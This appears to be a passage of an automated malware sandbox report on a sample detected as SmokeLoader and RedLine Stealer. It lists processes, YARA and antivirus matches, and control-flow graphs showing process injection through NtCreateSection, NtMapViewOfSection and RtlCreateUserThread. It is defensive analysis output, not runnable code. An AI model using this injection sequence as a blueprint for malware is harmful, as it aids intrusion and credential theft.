                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:00:02:17
                                                                    Start date:14/10/2024
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff609140000
                                                                    File size:5'141'208 bytes
                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:00:02:35
                                                                    Start date:14/10/2024
                                                                    Path:C:\Users\user\AppData\Roaming\fbtdajh
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\fbtdajh
                                                                    Imagebase:0x400000
                                                                    File size:274'944 bytes
                                                                    MD5 hash:29EAF4B051758C9946539B6BA8AA475F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 42%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.5%
                                                                      Dynamic/Decrypted Code Coverage:28.2%
                                                                      Signature Coverage:41.8%
                                                                      Total number of Nodes:170
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 3351 402e40 3353 402e37 3351->3353 3354 402edf 3353->3354 3355 4018e6 3353->3355 3356 4018f5 3355->3356 3357 40192e Sleep 3356->3357 3358 401949 3357->3358 3360 40195a 3358->3360 3361 401514 3358->3361 3360->3354 3362 401524 3361->3362 3363 4015c4 NtDuplicateObject 3362->3363 3369 4016e0 3362->3369 3364 4015e1 NtCreateSection 3363->3364 3363->3369 3365 401661 NtCreateSection 3364->3365 3366 401607 NtMapViewOfSection 3364->3366 3368 40168d 3365->3368 3365->3369 3366->3365 3367 40162a NtMapViewOfSection 3366->3367 3367->3365 3370 401648 3367->3370 3368->3369 3371 401697 NtMapViewOfSection 3368->3371 3369->3360 3370->3365 3371->3369 3372 4016be NtMapViewOfSection 3371->3372 3372->3369 3373 4177a0 3376 4173e0 3373->3376 3375 4177a5 3377 4173ed 3376->3377 3378 4175e0 3377->3378 3379 4174a7 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3377->3379 3380 4175f0 SetCommState 3378->3380 3386 417609 3378->3386 3381 41750b 7 API calls 3379->3381 3380->3378 3382 4175c1 3381->3382 3383 4175b8 GetBoundsRect 3381->3383 3384 4175d1 3382->3384 3385 4175ca PulseEvent 3382->3385 3383->3382 3384->3378 3385->3384 3387 417612 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3386->3387 3388 417647 3386->3388 3387->3388 3398 417020 LocalAlloc 3388->3398 3392 417684 LoadLibraryA 3399 417050 GetModuleHandleW GetProcAddress VirtualProtect 3392->3399 3393 4176dd 3400 417340 3393->3400 3395 4176e2 3396 417719 InterlockedDecrement 3395->3396 3397 41772f 3395->3397 3396->3395 3397->3375 3398->3392 3399->3393 3401 417369 QueryDosDeviceA 3400->3401 3402 41737a 3400->3402 3401->3402 3411 4171e0 3402->3411 3405 417395 3414 417220 3405->3414 3406 41738d FreeEnvironmentStringsA 3406->3405 3409 4173c3 3409->3395 3410 4173ac HeapDestroy GetNumaProcessorNode 3410->3409 3412 4171f1 FatalAppExitA GetModuleHandleW 3411->3412 3413 417203 3411->3413 3412->3413 3413->3405 3413->3406 3415 41722d 3414->3415 3416 417259 3415->3416 3417 417248 BuildCommDCBA 3415->3417 3418 417261 WritePrivateProfileStringA FreeEnvironmentStringsA 3416->3418 3421 417283 3416->3421 3417->3421 3418->3421 3419 41730a 3419->3409 3419->3410 3421->3419 3422 4172b9 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3421->3422 3423 417210 3421->3423 3422->3421 3426 4171a0 3423->3426 3427 4171c9 3426->3427 3428 4171bc SetEvent 3426->3428 3427->3421 3428->3427 3524 4176a3 3525 4176b0 LoadLibraryA 3524->3525 3533 417050 GetModuleHandleW GetProcAddress VirtualProtect 3525->3533 3528 4176dd 3529 417340 15 API calls 3528->3529 3530 4176e2 3529->3530 3531 417719 InterlockedDecrement 3530->3531 3532 41772f 3530->3532 3531->3530 3533->3528 3534 401542 3535 40153b 3534->3535 3536 4015c4 NtDuplicateObject 3535->3536 3542 4016e0 3535->3542 3537 4015e1 NtCreateSection 3536->3537 3536->3542 3538 401661 NtCreateSection 3537->3538 3539 401607 NtMapViewOfSection 3537->3539 3541 40168d 3538->3541 3538->3542 3539->3538 3540 40162a NtMapViewOfSection 3539->3540 3540->3538 3543 401648 3540->3543 3541->3542 3544 401697 NtMapViewOfSection 3541->3544 3543->3538 3544->3542 3545 4016be NtMapViewOfSection 3544->3545 3545->3542 3429 479003c 3430 4790049 3429->3430 3442 4790e0f SetErrorMode SetErrorMode 3430->3442 3435 4790265 3436 47902ce VirtualProtect 3435->3436 3438 479030b 3436->3438 3437 4790439 VirtualFree 3441 47904be LoadLibraryA 3437->3441 3438->3437 3440 47908c7 3441->3440 3443 4790223 3442->3443 3444 4790d90 3443->3444 3445 4790dad 3444->3445 3446 4790dbb GetPEB 3445->3446 3447 4790238 VirtualAlloc 3445->3447 3446->3447 3447->3435 3593 402dd0 3594 402ddc 3593->3594 3595 4018e6 8 API calls 3594->3595 3596 402edf 3594->3596 3595->3596 3505 4018f1 3506 4018f6 3505->3506 3507 40192e Sleep 3506->3507 3508 401949 3507->3508 3509 401514 7 API calls 3508->3509 3510 40195a 3508->3510 3509->3510 3448 2c1f914 3449 2c1f923 3448->3449 3452 2c200b4 3449->3452 3454 2c200cf 3452->3454 3453 2c200d8 CreateToolhelp32Snapshot 3453->3454 3455 2c200f4 Module32First 3453->3455 3454->3453 3454->3455 3456 2c20103 3455->3456 3457 2c1f92c 3455->3457 3459 2c1fd73 3456->3459 3460 2c1fd9e 3459->3460 3461 2c1fdaf VirtualAlloc 3460->3461 3462 2c1fde7 3460->3462 3461->3462 3580 401915 3581 40191a 3580->3581 3582 4018c6 3580->3582 3583 40192e Sleep 3581->3583 3584 401949 3583->3584 3585 401514 7 API calls 3584->3585 3586 40195a 3584->3586 3585->3586 3463 402f97 3464 4030ee 3463->3464 3465 402fc1 3463->3465 3465->3464 3466 40307c RtlCreateUserThread NtTerminateProcess 3465->3466 3466->3464 3479 4790001 3480 4790005 3479->3480 3485 479092b GetPEB 3480->3485 3482 4790030 3487 479003c 3482->3487 3486 4790972 3485->3486 3486->3482 3488 4790049 3487->3488 3489 4790e0f 2 API calls 3488->3489 3490 4790223 3489->3490 3491 4790d90 GetPEB 3490->3491 3492 4790238 VirtualAlloc 3491->3492 3493 4790265 3492->3493 3494 47902ce VirtualProtect 3493->3494 3496 479030b 3494->3496 3495 4790439 VirtualFree 3499 47904be LoadLibraryA 3495->3499 3496->3495 3498 47908c7 3499->3498 3570 402d7b 3572 402d38 3570->3572 3571 402dc7 3572->3570 3572->3571 3573 4018e6 8 API calls 3572->3573 3573->3571 3500 4790005 3501 479092b GetPEB 3500->3501 3502 4790030 3501->3502 3503 479003c 7 API calls 3502->3503 3504 4790038 3503->3504 3511 4014fe 3512 401506 3511->3512 3513 401531 3511->3513 3514 4015c4 NtDuplicateObject 3513->3514 3522 4016e0 3513->3522 3515 4015e1 NtCreateSection 3514->3515 3514->3522 3516 401661 NtCreateSection 3515->3516 3517 401607 NtMapViewOfSection 3515->3517 3519 40168d 3516->3519 3516->3522 3517->3516 3518 40162a NtMapViewOfSection 3517->3518 3518->3516 3520 401648 3518->3520 3521 401697 NtMapViewOfSection 3519->3521 3519->3522 3520->3516 3521->3522 3523 4016be NtMapViewOfSection 3521->3523 3523->3522

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4173e0-417408 2 417410-417417 0->2 3 417419-41741b 2->3 4 41741f-417425 2->4 3->4 5 417427-417431 4->5 6 417436-417440 4->6 5->6 7 417442-41744e 6->7 8 417458-41745f 6->8 7->8 8->2 9 417461-417469 8->9 11 417470-417476 9->11 12 417484-41748b 11->12 13 417478-41747e 11->13 14 417491-417498 12->14 15 41748d 12->15 13->12 14->11 16 41749a-4174a1 14->16 15->14 17 4175e0-4175ee 16->17 18 4174a7-4175b6 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 4175f0-4175fe SetCommState 17->19 21 4175c1-4175c8 18->21 22 4175b8-4175bb GetBoundsRect 18->22 26 417600-417607 19->26 27 417609-417610 19->27 24 4175d1-4175dd 21->24 25 4175ca-4175cb PulseEvent 21->25 22->21 24->17 25->24 26->19 26->27 28 417612-417679 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 27->28 29 41767f-41768e call 417020 27->29 28->29 34 417690-4176a1 29->34 35 4176cd-4176d8 LoadLibraryA call 417050 29->35 39 4176b0-4176c0 34->39 42 4176dd-4176ee call 417340 35->42 40 4176c2 39->40 41 4176c8-4176cb 39->41 40->41 41->35 41->39 47 4176f0-4176f7 42->47 48 417703-417709 47->48 49 4176f9-4176ff 47->49 51 417710-417717 48->51 52 41770b call 417040 48->52 49->48 54 417726-41772d 51->54 55 417719-417720 InterlockedDecrement 51->55 52->51 54->47 57 41772f-41773f 54->57 55->54 59 417740-417750 57->59 60 417752 59->60 61 417759-41775c 59->61 60->61 61->59 63 41775e-417769 61->63 65 417770-417775 63->65 66 417777-41777d 65->66 67 41777f-417785 65->67 66->67 68 417787-417794 66->68 67->65 67->68
                                                                      APIs
                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004174B0
                                                                      • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 004174C9
                                                                      • FindAtomW.KERNEL32(00000000), ref: 004174D0
                                                                      • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 004174D8
                                                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004174F0
                                                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417517
                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0041751F
                                                                      • GetVersionExW.KERNEL32(?), ref: 0041752C
                                                                      • DisconnectNamedPipe.KERNEL32(?), ref: 0041753F
                                                                      • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00417584
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417593
                                                                      • LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004175A9
                                                                      • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004175BB
                                                                      • PulseEvent.KERNEL32(00000000), ref: 004175CB
                                                                      • SetCommState.KERNELBASE(00000000,00000000), ref: 004175F4
                                                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417621
                                                                      • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417632
                                                                      • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041763A
                                                                      • LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
                                                                      • String ID: k`$}$
                                                                      • API String ID: 2183200751-956986773
                                                                      • Opcode ID: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
                                                                      • Instruction ID: 4b0af0e3fa1ca4ab076df1e70508018619d961bc3f3b7d37d78c72f8efd93fb6
                                                                      • Opcode Fuzzy Hash: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
                                                                      • Instruction Fuzzy Hash: CE911371845524ABC720AB65EC44ADF7F79EF4E351F01406EF50AA3190CB381A85CFAD

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 174 401595-4015be 171->174 175 401896-4018a5 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 178 4018b4 175->178 179 4018ab-4018b0 175->179 178->179 180 4018b7 178->180 179->180 181 4018c5 180->181 182 4018bc-4018e3 call 401193 180->182 181->182 185->175 187 4015e1-401605 NtCreateSection 185->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 192 40168d-401691 189->192 190->189 191 40162a-401646 NtMapViewOfSection 190->191 191->189 194 401648-40165e 191->194 192->175 195 401697-4016b8 NtMapViewOfSection 192->195 194->189 195->175 197 4016be-4016da NtMapViewOfSection 195->197 197->175 200 4016e0 call 4016e5 197->200
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                      • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                      • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                      • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 221 401595-4015be 218->221 222 401896-4018a5 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 225 4018b4 222->225 226 4018ab-4018b0 222->226 225->226 227 4018b7 225->227 226->227 228 4018c5 227->228 229 4018bc-4018e3 call 401193 227->229 228->229 232->222 234 4015e1-401605 NtCreateSection 232->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 239 40168d-401691 236->239 237->236 238 40162a-401646 NtMapViewOfSection 237->238 238->236 241 401648-40165e 238->241 239->222 242 401697-4016b8 NtMapViewOfSection 239->242 241->236 242->222 244 4016be-4016da NtMapViewOfSection 242->244 244->222 247 4016e0 call 4016e5 244->247
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                      • String ID:
                                                                      • API String ID: 1652636561-0
                                                                      • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                      • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                      • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                      • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 265 401595-4015be 262->265 266 401896-4018a5 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 269 4018b4 266->269 270 4018ab-4018b0 266->270 269->270 271 4018b7 269->271 270->271 272 4018c5 271->272 273 4018bc-4018e3 call 401193 271->273 272->273 276->266 278 4015e1-401605 NtCreateSection 276->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 283 40168d-401691 280->283 281->280 282 40162a-401646 NtMapViewOfSection 281->282 282->280 285 401648-40165e 282->285 283->266 286 401697-4016b8 NtMapViewOfSection 283->286 285->280 286->266 288 4016be-4016da NtMapViewOfSection 286->288 288->266 291 4016e0 call 4016e5 288->291
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                      • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                      • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                      • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 304 401595-4015be 301->304 305 401896-4018a5 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 308 4018b4 305->308 309 4018ab-4018b0 305->309 308->309 310 4018b7 308->310 309->310 311 4018c5 310->311 312 4018bc-4018e3 call 401193 310->312 311->312 315->305 317 4015e1-401605 NtCreateSection 315->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 322 40168d-401691 319->322 320->319 321 40162a-401646 NtMapViewOfSection 320->321 321->319 324 401648-40165e 321->324 322->305 325 401697-4016b8 NtMapViewOfSection 322->325 324->319 325->305 327 4016be-4016da NtMapViewOfSection 325->327 327->305 330 4016e0 call 4016e5 327->330
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                      • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                      • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                      • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 344 401595-4015be 341->344 345 401896-4018a5 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 348 4018b4 345->348 349 4018ab-4018b0 345->349 348->349 350 4018b7 348->350 349->350 351 4018c5 350->351 352 4018bc-4018e3 call 401193 350->352 351->352 355->345 357 4015e1-401605 NtCreateSection 355->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 362 40168d-401691 359->362 360->359 361 40162a-401646 NtMapViewOfSection 360->361 361->359 364 401648-40165e 361->364 362->345 365 401697-4016b8 NtMapViewOfSection 362->365 364->359 365->345 367 4016be-4016da NtMapViewOfSection 365->367 367->345 370 4016e0 call 4016e5 367->370
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                      • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                      • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                      • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-40301c 407->409 410 403042-403044 408->410 412 403062-403065 408->412 409->410 411 40301e-403027 409->411 413 403045 410->413 411->413 414 403029-403038 411->414 415 403067-40306a 412->415 416 40306e 412->416 417 403047-403061 413->417 418 40306b-40306c 413->418 414->408 415->416 415->418 416->405 419 40306f 416->419 417->412 420 403070-403075 418->420 419->420 420->403 421 403077-40307a 420->421 421->403 422 40307c-4030eb RtlCreateUserThread NtTerminateProcess 421->422 422->403
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                      • String ID:
                                                                      • API String ID: 1921587553-0
                                                                      • Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                      • Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
                                                                      • Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                      • Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 423 2c200b4-2c200cd 424 2c200cf-2c200d1 423->424 425 2c200d3 424->425 426 2c200d8-2c200e4 CreateToolhelp32Snapshot 424->426 425->426 427 2c200e6-2c200ec 426->427 428 2c200f4-2c20101 Module32First 426->428 427->428 435 2c200ee-2c200f2 427->435 429 2c20103-2c20104 call 2c1fd73 428->429 430 2c2010a-2c20112 428->430 433 2c20109 429->433 433->430 435->424 435->428
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C200DC
                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02C200FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c1d000_file.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
